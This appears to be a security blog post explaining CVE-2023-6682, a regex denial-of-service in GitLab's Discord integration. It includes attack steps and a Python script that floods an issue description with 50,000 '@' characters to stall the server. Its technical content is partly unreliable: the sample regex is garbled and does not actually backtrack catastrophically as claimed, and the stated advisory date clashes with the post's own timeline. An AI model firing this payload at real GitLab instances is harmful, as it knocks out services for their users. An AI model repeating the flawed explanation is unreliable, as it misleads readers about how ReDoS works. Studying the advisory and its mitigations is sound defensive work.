*Image source: regexvuln.com*
Introduction
On March 12, 2024, GitLab published a security advisory about a new vulnerability tagged as CVE-2023-6682. This issue is a Regular Expression Denial of Service (ReDoS) affecting all GitLab CE (Community Edition) and EE (Enterprise Edition) installations from version 16.9 up to, but not including, 16.9.7, from 16.10 up to, but not including, 16.10.5, and from 16.11 up to, but not including, 16.11.2. The problem arises from vulnerable logic in how GitLab processes Discord integration chat messages.
This post breaks down what happened, what code is at risk, how an attacker might exploit it, and how you can protect your GitLab.
What Is CVE-2023-6682?
Regular Expression Denial of Service (ReDoS) is a classic vulnerability. Many applications use regex to filter and parse content. Bad regex patterns can sometimes take exponential time to evaluate for certain inputs—effectively locking up the CPU until it either times out or brings everything to a halt.
In this case, GitLab’s Discord integration handles event messages. It tries to parse and format those messages using a regex—which, when given “evil” input, will chew up massive server resources.
Official Reference
- GitLab Security Release: GitLab 16.9.7, 16.10.5, and 16.11.2 Released
- NVD CVE-2023-6682 Detail
Root of the Problem
The Discord integration allows you to send chat messages to Discord channels when certain GitLab events happen. Vulnerable versions attempted to process those messages using a regex that isn’t properly designed for some edge cases.
Let’s say the buggy code looked something like this (simplified for readability)
# Vulnerable: Example from GitLab code base
def extract_mentions(message)
# Matches @username mentions in Discord messages
# Problem: The regex can take forever if the string is very long and full of '@'
message.scan(/@([a-zA-Z-9_]+)/)
end
Looks innocent, huh? But if an attacker sends an extremely long string with tons of "@" and characters, the regex engine will bog down, trying to find matches in a string purposefully crafted to slow it to a crawl.
Send the following as a chat message into a channel that syncs with GitLab
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...
(repeat the '@' character tens of thousands of times)
Depending on the regex (especially if it’s greedy, backtracking, or has nesting), this can push the server into nearly infinite loops. The CPU spikes, the app gets unresponsive, and, if repeated, may crash the service or bring the whole server down.
Attacker identifies a GitLab project with Discord integration enabled.
2. Attacker crafts a specially designed message—generally long repeats of certain symbols or malformed text.
3. Attacker triggers an event (such as creating a new issue or comment, which triggers a Discord notification).
4. GitLab processes the message with its bad regex—which stalls server CPU for seconds to minutes, depending on input.
If you want to test locally (on your own non-production sandbox)
# Make an API call or form submission to GitLab that triggers a Discord webhook
import requests
gitlab_project_url = 'https://gitlab.example.com/myproject';
api_token = 'your_private_token'
long_evil_msg = '@' * 50000 # 50,000 "@" symbols
data = {
'title': 'Test for ReDoS',
'description': long_evil_msg, # This goes in the message processed by GitLab/Discord
}
headers = {
'PRIVATE-TOKEN': api_token
}
# Create a new issue (which triggers a Discord notification if set up to do so)
resp = requests.post(
gitlab_project_url + '/issues',
headers=headers,
data=data
)
print(resp.status_code)
Note: *Never attack production servers! Use for educational purposes and with written permission only.*
Upgrade GitLab right away! The GitLab team has released patches in these versions
- 16.9.7
- 16.10.5
- 16.11.2
Read the upgrade docs at GitLab’s Upgrade Guide.
If you can’t upgrade right away, disable the Discord integration, block problematic users, or filter incoming messages at a reverse proxy until you can patch.
Limit untrusted input lengths before processing.
- Use regex engines with built-in timeouts or “safe” regex libraries (like safe-regex for JavaScript).
References
- GitLab Official CVE-2023-6682 Advisory
- NVD: CVE-2023-6682
- Regular Expression Denial of Service (OWASP)
Summary
CVE-2023-6682 is a classic demonstration of how a small regex mistake can have huge consequences. If you’re using GitLab with Discord chat integrations, update to the latest fixed version ASAP. Never trust user input in your regex, and always keep an eye on your code's performance with edge-case inputs.
Stay safe, patch often, and don’t let regex bring your DevOps to its knees!
Timeline
Published on: 05/14/2024 14:35:29 UTC
Last modified on: 05/14/2024 16:13:02 UTC